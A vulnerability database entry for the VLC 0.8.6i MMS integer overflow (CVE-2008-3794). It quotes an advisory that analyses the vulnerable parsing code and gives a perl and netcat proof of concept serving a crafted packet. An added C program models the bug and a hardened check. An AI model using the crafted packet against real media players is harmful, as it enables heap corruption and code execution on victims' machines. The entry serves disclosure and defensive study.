VLC Media Player MMS Protocol Handling Integer Overflow Vulnerability

Vulnerability ID 1115957 Vulnerability type Numeric error
Published 2008-08-23 Updated 2009-06-18
CVE ID CVE-2008-3794 CNNVD ID CNNVD-200808-315
Platform Multiple CVSS score 6.8
|Sources
https://www.exploit-db.com/exploits/6293
https://www.securityfocus.com/bid/30806
https://cxsecurity.com/issue/WLB-2008080182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-315
|Vulnerability details
VLC Media Player (VideoLAN) is a free media player. In VLC Media Player 0.8.6i, the mms_ReceiveCommand function in modules/access/mms/mmstu.c contains an integer signedness error. An attacker can trigger a heap overflow by crafting a special mmst link and thereby execute arbitrary code.
|Exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name       	: VLC 0.8.6i MMS Protocol Handling
Class        	: Heap Overflow
Published   	: 2008-08-24
Credit		: g_ (g_ # orange-bat # com)

- - Details -

This can be exploited from remote. Users have to open an mmst://
link pointing to a server controlled by the attacker.

vlc\modules\access\mms\mmstu.c :

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )	
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );	//BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
                              uint8_t *p_data,
                              int i_data,
                              int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                   i_length - i_data  );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot 

open this url in VLC:

mmst://127.0.0.1/

boom! headshot :)

- - PGP -

All advisories from Orange Bat are signed. You can find our public
key here: http://www.orange-bat.com/g_.asc

- - Disclaimer -

This document and all the information it contains is provided "as is",
without any warranty. Orange Bat is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.

(c) 2008 www.orange-bat.com 


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70

iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2
AuIAnRjabi6RiPT6G/66kxseVG+K0rkj
=/CN5
-----END PGP SIGNATURE-----

# milw0rm.com [2008-08-23]
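The signedness error described in the vulnerability details and walked through in the advisory above reduces to one arithmetic step: a 32-bit length read from the wire has 16 added and is stored in a signed int, so a large field wraps to a small negative number that passes both the "truncated command" check and the `i_used < MMS_BUFFER_SIZE` guard, after which `MMS_BUFFER_SIZE - i_used` is larger than the buffer. The C program below is an added example and is not code from VLC, from the advisory, or from the upstream fix. It models that control flow on a constructed 112-byte sample packet (a 12-byte header carrying the 0xb00bface magic shown in the proof of concept, followed by 100 filler bytes) and reports what the original memmove would have been asked to copy without performing any copy; it then shows an unsigned, bounds-checked variant of the same length validation. The value of MMS_BUFFER_SIZE, the sample packet layout and the hardened variant are all assumptions of this example, not VLC's code.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption: MMS_BUFFER_SIZE is VLC's own symbol; the value here is illustrative only. */
#define MMS_BUFFER_SIZE 65536
/* Constructed sample packet: 12-byte command header (4 filler bytes, the 0xb00bface magic
 * seen in the advisory's proof of concept, a 4-byte little-endian length field) + 100 payload bytes. */
#define SAMPLE_LEN 112

/* Little-endian 32-bit read, the role GetDWLE() plays in the excerpt. */
static uint32_t get_dwle(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fill the constructed sample packet with the given length field; returns its size. */
static size_t build_packet(uint8_t out[SAMPLE_LEN], uint32_t length_field)
{
    static const uint8_t magic[4] = { 0xce, 0xfa, 0x0b, 0xb0 };
    memset(out, 'a', SAMPLE_LEN);
    memcpy(out + 4, magic, 4);
    for (int i = 0; i < 4; i++)
        out[8 + i] = (uint8_t)(length_field >> (8 * i));
    return SAMPLE_LEN;
}

/* The excerpt's arithmetic: wire length + 16 stored in a signed int, so a large field wraps negative. */
int vulnerable_i_used_for(uint32_t length_field)
{
    uint8_t buf[SAMPLE_LEN];
    build_packet(buf, length_field);
    return (int)(get_dwle(buf + 8) + 16u);
}

/* Model of the excerpt's control flow. Returns -1 when mms_ParseCommand rejects the command as
 * truncated, 0 when the `i_used < MMS_BUFFER_SIZE` guard skips the memmove, otherwise the byte
 * count MMS_BUFFER_SIZE - i_used that the memmove would copy. Nothing is copied here. */
long vulnerable_memmove_len_for(uint32_t length_field)
{
    int i_data = SAMPLE_LEN;
    int i_length = vulnerable_i_used_for(length_field);
    if (i_length > i_data)            /* a negative i_length never trips the truncation check */
        return -1;
    int i_used = i_length;
    if (!(i_used < MMS_BUFFER_SIZE))  /* signed compare: negative values pass */
        return 0;
    return (long)MMS_BUFFER_SIZE - i_used;
}

/* Overflow when the modelled copy is longer than the buffer it targets. */
bool vulnerable_would_overflow(uint32_t length_field)
{
    return vulnerable_memmove_len_for(length_field) > MMS_BUFFER_SIZE;
}

/* Added hardening (an assumption of this example, not the project's own fix): unsigned
 * throughout, refuse the +16 wrap, and bound the length by both the bytes received and the
 * buffer size. Returns the accepted length, or -1 when the command must not be consumed. */
long hardened_used_for(uint32_t length_field)
{
    uint8_t buf[SAMPLE_LEN];
    size_t pkt_len = build_packet(buf, length_field);
    uint32_t body = get_dwle(buf + 8);
    if (body > UINT32_MAX - 16u) return -1;    /* adding the header size would wrap */
    uint32_t i_length = body + 16u;
    if (i_length > pkt_len) return -1;         /* truncated: wait for more data instead */
    if (i_length > MMS_BUFFER_SIZE) return -1; /* can never fit the receive buffer */
    return (long)i_length;
}

int main(void)
{
    const uint32_t fields[] = { 84u, 200u, 0xFFFFFF00u, 0xFFFFFFF5u };
    for (size_t i = 0; i < sizeof fields / sizeof fields[0]; i++)
        printf("field 0x%08x: i_used=%d memmove_len=%ld overflow=%d hardened=%ld\n",
               fields[i], vulnerable_i_used_for(fields[i]), vulnerable_memmove_len_for(fields[i]),
               (int)vulnerable_would_overflow(fields[i]), hardened_used_for(fields[i]));
    return 0;
}
```

With a length field of 0xFFFFFF00 the modelled `i_used` is -240, the truncation check and the size guard both pass, and the copy length becomes MMS_BUFFER_SIZE + 240, which is the overflow; the hardened check rejects the same packet, and also rejects a field of 200 (216 bytes claimed, 112 received) and a field of 0xFFFFFFF5 (the +16 would wrap), while accepting a well-formed 100-byte command. Keeping the length unsigned and comparing it against the bytes actually received is the property a reviewer should look for in any packet parser of this shape.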
|Affected products
VideoLAN VLC media player 0.8.6 i; Pardus Linux 2008 0; Gentoo Linux; Debian Linux 4.0 sparc; Debian Linux 4.0 s/390; Debian Linux 4.0 powerpc; Debian Linux 4
|References

Source: XF
Name: vlcmediaplayer-memmove-bo (44659)
Link: http://xforce.iss.net/xforce/xfdb/44659
Source: SECTRACK
Name: 1020759
Link: http://www.securitytracker.com/id?1020759
Source: BID
Name: 30806
Link: http://www.securityfocus.com/bid/30806
Source: MISC
Link: http://www.orange-bat.com/adv/2008/adv.08.24.txt
Source: MLIST
Name: [oss-security] 20080824 Re: CVE id request: vlc
Link: http://www.openwall.com/lists/oss-security/2008/08/24/3
Source: MILW0RM
Name: 6293
Link: http://www.milw0rm.com/exploits/6293
Source: SREASON
Name: 4190
Link: http://securityreason.com/securityalert/4190
Source: GENTOO
Name: GLSA-200809-06
Link: http://security.gentoo.org/glsa/glsa-200809-06.xml
Source: MLIST
Name: [vlc-devel] 20080824 commit: MMS integers handling fixes, including buffer overflow (Rémi Denis-Courmont)
Link: http://mailman.videolan.org/pipermail/vlc-devel/2008-August/048488.html